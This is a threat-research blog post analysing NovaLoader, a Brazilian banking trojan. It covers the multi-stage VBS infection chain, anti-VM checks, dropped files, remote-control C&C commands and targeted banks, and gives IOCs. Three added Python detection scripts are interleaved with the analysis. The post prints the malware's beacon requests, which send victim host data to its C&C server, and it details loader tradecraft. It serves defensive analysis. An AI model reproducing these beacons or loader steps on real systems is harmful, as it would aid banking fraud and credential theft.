
NovaLoader, yet another Brazilian banking malware family

NovaLoader features a multi-stage payload delivery

By: Abhay Kant Yadav, Atinderpal Singh

Malware


As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.

 

Delivery method

In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub, Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS.

NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones.

Activity Flowchart

Fig.1: NovaLoader Infection flow

 

Main Dropper

MD5: 4ef89349a52f9fcf9a139736e236217e

The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.

 


Fig. 2: Stage 1 VB script decryption loop

 

Stage 1 Script

Embedded script before and after decryption:


Fig. 3: VB script before and after decryption

This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption.


Fig. 4: Download request for the next stage, an encrypted payload

 

Stage 2 Script

The downloaded VB script looks like the following after decryption:


Fig. 5: VBS after decryption

The VB script sends a GET request to “http://54.95.36[.]242/contaw.php”, possibly to let the command-and-control (C&C) server know that it is running on the system. After that, it tries to detect the presence of a virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.


Fig. 6: VM detection code

NovaLoader drops copies of the following executable files into the directory C:\Users\Public\:

C:\Windows\(system32|SysWOW64)\rundll32.exe
C:\Windows\(system32|SysWOW64)\Magnification.dll


Fig. 7: C&C notification request

After that, it downloads the following files from 32atendimentodwosgraumell[.]club:

32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip

Then it sends multiple GET requests to “54.95.36.242/contaw{1-7}.php”:

Fig. 8: Multiple C&C requests

GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_
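The contaw*.php beacons above are a convenient network detection point: the path pattern is fixed, and the w= parameter carries the victim's computer name, OS string, a timestamp and what look like disk sizes, so a defender can both flag the traffic and recover which internal host is infected and how far the script got. The following Python is an added example written for this post, not code from the page or from ThreatLabZ. It runs over a few constructed proxy log lines (timestamp, client IP, method, URL, status) that reproduce the beacon format; the computer name WIN7-PC stands in for the redacted value, and the reading of the CD=/CD1= values as disk sizes in KB is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample proxy log lines (timestamp, client IP, method, URL, status).
# The beacon URLs mirror the contaw*.php pattern from the capture above; the
# hostname WIN7-PC stands in for the redacted value. The last line is benign.
SAMPLE_LOG = """\
2019-02-01T17:05:01Z 10.0.0.5 GET http://54.95.36.242/contaw.php 200
2019-02-01T17:05:02Z 10.0.0.5 GET http://54.95.36.242/contaw2.php?w=WIN7-PC_Microsoft%20Windows%207%20Professional%20_True 200
2019-02-01T17:05:03Z 10.0.0.5 GET http://54.95.36.242/contaw6.php?w=WIN7-PC_2/1/2019%205:05:06%20PM 200
2019-02-01T17:05:04Z 10.0.0.5 GET http://54.95.36.242/contaw7.php?w=WIN7-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ 200
2019-02-01T17:05:05Z 10.0.0.7 GET http://www.example.com/index.php?w=hello 200
"""

# One beacon per line: /contaw.php (first check-in) or /contaw<N>.php?w=<data>.
BEACON_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) GET https?://(?P<host>[^/\s]+)"
    r"/contaw(?P<stage>\d?)\.php(?:\?w=(?P<w>\S*))? \d{3}$"
)
# CD=414Kb / CD1=9160Kb in the contaw7 beacon; assumed to be disk sizes in KB.
DISK_RE = re.compile(r"(CD\d*)=(\d+)Kb")


def parse_beacon(line):
    """Return a dict describing one contaw*.php beacon, or None if the line is not one."""
    m = BEACON_RE.match(line.strip())
    if not m:
        return None
    raw = unquote(m["w"]) if m["w"] is not None else ""
    fields = raw.split("_") if raw else []   # fields are joined with "_"
    return {
        "ts": m["ts"],
        "src": m["src"],
        "host": m["host"],
        "stage": int(m["stage"]) if m["stage"] else 1,  # bare contaw.php counts as stage 1
        "victim_host": fields[0] if fields else None,   # first field is the computer name
        "fields": fields,
        "disk": {k: int(v) for k, v in DISK_RE.findall(raw)},
    }


def find_beacons(log_text):
    """All beacons found in a block of log text, in file order."""
    return [b for b in (parse_beacon(l) for l in log_text.splitlines()) if b]


def stages_by_source(beacons):
    """Map each internal client to the sorted list of beacon stages it sent."""
    out = {}
    for b in beacons:
        out.setdefault(b["src"], set()).add(b["stage"])
    return {src: sorted(s) for src, s in out.items()}


if __name__ == "__main__":
    hits = find_beacons(SAMPLE_LOG)
    for b in hits:
        print(b["ts"], b["src"], "stage", b["stage"], b["victim_host"], b["disk"])
    print(stages_by_source(hits))
```

Seeing stages 1 through 7 from one client in quick succession means the stage 2 script ran to completion, including the file downloads, so that host should be treated as fully compromised rather than merely exposed to the dropper.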

It will also drop several files into the C:\Users\Public\ directory:

Dropped file | MD5 | Comment
--- | --- | ---
DST.exe | 51138BEEA3E2C21EC44D0932C71762A8 | copied rundll32.exe
I | 3DC26D510907EAAC8FDC853D5F378A83 | encrypted file containing various values such as version, extension, etc.
I_ | A34F1D7ED718934185EC96984E232784 | encrypted configuration file
KC | 89473D02FEB24CE5BDE8F7A559631351 | similar to the file named "I"
mwg.dll | F3F571288CDE445881102E385BF3471F | copied Magnification.dll
PFPQUN.DST | 8C03B522ACB4DDC7F07AB391E79F1601 | support DLL to decrypt the main payload
PFPQUN1.DST | F3D4520313D05C66CEBA8BDA748C0EA9 | encrypted main payload
winx86.dll | 87F9E5A6318AC1EC5EE05AA94A919D7A | SQLite DLL

Fig. 9: Files dropped by script

And, finally, it executes the exported function of the decrypted DLL using the copied rundll32.exe.

Fig. 10: Executing the stage-3 payload

The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.
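The loader step gives endpoint defenders two strong signals at once: a renamed copy of rundll32.exe (DST.exe) running from C:\Users\Public\ instead of System32 or SysWOW64, and a rundll32 command line loading a module out of that same world-writable directory. The Python below is an added detection example, not code from the page or from ThreatLabZ. It checks constructed process-creation events shaped like Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine); the export name ExportName is a hypothetical placeholder, since the page does not give the real one.

```python
import re
from pathlib import PureWindowsPath

# Directories from which a genuine rundll32.exe is expected to run.
LEGIT_RUNDLL32_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
# Any module path under C:\Users\Public referenced on the command line.
PUBLIC_MODULE_RE = re.compile(r"(?i)[a-z]:\\users\\public\\\S+")

# Constructed events resembling Sysmon process-creation fields (assumption).
# Event 0 models NovaLoader's copied rundll32 (DST.exe) loading its dropped DLL;
# ExportName is a hypothetical placeholder. Event 1 is ordinary, benign rundll32 use.
# Event 2 is genuine rundll32 loading a module from the Public directory.
EVENTS = [
    {"Image": r"C:\Users\Public\DST.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r'"C:\Users\Public\DST.exe" C:\Users\Public\PFPQUN.DST,ExportName'},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Users\Public\mwg.dll,SomeExport"},
]


def rundll32_reasons(event):
    """Return the list of reasons this process-creation event looks like the loader step."""
    image = event.get("Image", "")
    orig = event.get("OriginalFileName", "")
    cmd = event.get("CommandLine", "")
    reasons = []
    # Renamed/relocated rundll32: the PE's original name says rundll32, the path does not.
    parent = str(PureWindowsPath(image).parent).lower()
    if orig.lower() == "rundll32.exe" and parent not in LEGIT_RUNDLL32_DIRS:
        reasons.append(f"rundll32 binary running from unexpected path: {image}")
    # rundll32 (real or copied) loading a module from the world-writable Public directory.
    m = PUBLIC_MODULE_RE.search(cmd)
    if orig.lower() == "rundll32.exe" and m:
        reasons.append(f"rundll32 loading module from Public directory: {m.group(0)}")
    return reasons


def scan(events):
    """(index, reasons) for every event that trips at least one check."""
    hits = []
    for i, ev in enumerate(events):
        reasons = rundll32_reasons(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(EVENTS):
        print(f"event {idx}:")
        for r in reasons:
            print("  -", r)
```

Keying on OriginalFileName rather than the on-disk name is what catches the DST.exe copy; keying on the module path catches the case where the operator drops the DLL but invokes the real rundll32.exe. Both checks are cheap enough to run on every process-creation event.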

 

Final payload

The final payload is written in Delphi. It has multiple capabilities, including stealing the victim's credentials for several Brazilian banks. It monitors browser window titles for bank names and, if a targeted tab is found, the malware can take control of the system and lock the victim out of the real bank's page while it carries out its fraudulent activity under instruction from its C&C. Its activity is quite similar to the well-known Overlay RAT.

Some of the interesting commands used by the malware include:

Command string | Description
--- | ---
<|SocketMain|> | Stabilize the socket connection
<|Info|> | Send details of the infected OS
<|PING|> | Check the status of the connection
<|Close|> | Close all connections
<|REQUESTKEYBOARD|> | Send keystrokes to the active application window
<|MousePos|> | Set mouse position
<|MouseLD|> | Set mouse left button down
<|MouseLU|> | Set mouse left button up
<|MouseRD|> | Set mouse right button up
<|MouseRU|> | Set mouse right button down
<|Desktop|> | Share the compromised system's desktop
<|gets|> | Check for "gets" in the C&C response to verify the data is correct; reply with <|okok|>

Fig. 11: NovaLoader C&C commands
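Because the C&C protocol frames every command as <|Name|>, a captured session can be inventoried with a simple tokenizer, which is useful both for confirming an infection from a PCAP and for spotting commands outside the documented set. The Python below is an added example, not code from the page or from ThreatLabZ. It splits a constructed session string on the <|...|> framing, counts known commands from Fig. 11 (treating <|okok|> as the bot's reply to <|gets|>), flags unknown tokens, and reports whether any remote-control command appeared; the token <|Screenshot|> and the payload values are constructed for illustration and are not from the malware.

```python
import re
from collections import Counter

# Command and reply tokens documented in Fig. 11; <|okok|> is the reply named
# in the <|gets|> description.
KNOWN_TOKENS = {
    "SocketMain": "stabilize socket connection",
    "Info": "send infected OS details",
    "PING": "check connection status",
    "Close": "close all connections",
    "REQUESTKEYBOARD": "send keystrokes to the active application window",
    "MousePos": "set mouse position",
    "MouseLD": "set mouse left button down",
    "MouseLU": "set mouse left button up",
    "MouseRD": "set mouse right button up",
    "MouseRU": "set mouse right button down",
    "Desktop": "share compromised system desktop",
    "gets": "data check; bot replies <|okok|>",
    "okok": "acknowledgement reply from the bot",
}
# Commands whose presence means the operator is driving the victim's session.
REMOTE_CONTROL = {"REQUESTKEYBOARD", "MousePos", "MouseLD", "MouseLU",
                  "MouseRD", "MouseRU", "Desktop"}

TOKEN_RE = re.compile(r"<\|([A-Za-z0-9]+)\|>")

# Constructed session (not a real capture); <|Screenshot|> is a made-up token
# included only to show how undocumented commands are flagged.
SAMPLE_STREAM = ("<|SocketMain|><|Info|>WIN7-PC|Windows 7<|PING|><|MousePos|>100|200"
                 "<|MouseLD|><|MouseLU|><|gets|>ok<|okok|><|Screenshot|><|Close|>")


def tokenize(stream):
    """Split a session into (command, payload) pairs; payload is the text up to the next token."""
    matches = list(TOKEN_RE.finditer(stream))
    pairs = []
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(stream)
        pairs.append((m.group(1), stream[m.end():end]))
    return pairs


def inventory(stream):
    """Count every token and list the ones not documented in Fig. 11."""
    counts = Counter(cmd for cmd, _ in tokenize(stream))
    unknown = sorted(t for t in counts if t not in KNOWN_TOKENS)
    return counts, unknown


def remote_control_seen(stream):
    """True if the operator issued any keyboard, mouse or desktop-sharing command."""
    return any(cmd in REMOTE_CONTROL for cmd, _ in tokenize(stream))


if __name__ == "__main__":
    counts, unknown = inventory(SAMPLE_STREAM)
    for cmd, n in counts.items():
        print(f"{cmd:16} x{n}  {KNOWN_TOKENS.get(cmd, '<undocumented>')}")
    print("undocumented tokens:", unknown)
    print("remote control observed:", remote_control_seen(SAMPLE_STREAM))
```

On a real capture, <|SocketMain|> followed by <|Info|> and then any mouse or keyboard command is the sequence that distinguishes an operator actively working a victim from a bot merely checking in with <|PING|>.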

There were many interesting strings related to the Brazilian banks found in malware:

String in malware | Corresponding bank site
--- | ---
caixa | http://www.caixa.gov.br
bancodobrasil | https://www2.bancobrasil.com.br
bbcombr | https://www.bb.com.br/
bradesco | https://banco.bradesco/
santander | https://www.santander.com.br/
bancodaamazonia | https://www.bancoamazonia.com.br/
brbbanknet | https://brbbanknet.brb.com.br/netbanking/
banese | https://www.banese.com.br/
banestes | https://www.banestes.com.br/
bancodoestadodopar | https://www.banpara.b.br/
bancobs2 | https://www.bs2.com/
citibankbrasil | https://www.citibank.com.br
bancofibraonline | https://www.bancofibra.com.br/
agibank | https://www.agibank.com.br/
bancoguanabara | http://www.bancoguanabara.com.br/
ccbbrasil | http://www.br.ccb.com
bancoindusval | https://www.bip.b.br/ir
internetbankingbancointer | https://internetbanking.bancointer.com.br/
modalbanking | https://modalbanking.modal.com.br/
bancopan | https://www.bancopan.com.br/
pineonline | https://www.pine.com/

Fig. 12: Some of the targeted bank strings found in the malware
 

Conclusion

Brazilian threat actors are among the most prolific contributors to global cybercrime, and they are constantly devising new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.

 

IOCs

MD5

60e5f9fe1b778b4dc928f9d4067b470b
4ef89349a52f9fcf9a139736e236217e
100ff8b5eeed3fba85a1f64db319ff40
99471d4f03fb5ac5a409a79100cd9349
cb2ef5d8a227442d0156de82de526b30
a16273279d6fe8fa12f37c57345d42f7
ac4152492e9a2c4ed1ff359ee7e990d1
fdace867e070df4bf3bdb1ed0dbdb51c
4d5d1dfb84ef69f7c47c68e730ec1fb7
6bf65db5511b06749711235566a6b438
c5a573d622750973d90af054a09ab8dd
ef5f2fd7b0262a5aecc32e879890fb40
35803b81efc043691094534662e1351c
34340c9045d665b800fcdb8c265eebec
a71e09796fb9f8527afdfdd29c727787
5a9f779b9cb2b091c9c1eff32b1f9754
a7117788259030538601e8020035867e
cb9f95cec3debc96ddc1773f6c681d8c
a7722ea1ca64fcd7b7ae2d7c86f13013

URLs

185[.]141[.]195[.]5/prt1.txt
185[.]141[.]195[.]81/prt3.txt
185[.]141[.]195[.]74/prt1.txt
dwosgraumellsa[.]club/cabaco2.txt
wn5zweb[.]online/works1.txt
23[.]94[.]243[.]101/vdb1.txt
167[.]114[.]31[.]95/gdo1.txt
167[.]114[.]31[.]93/gdo1.txt



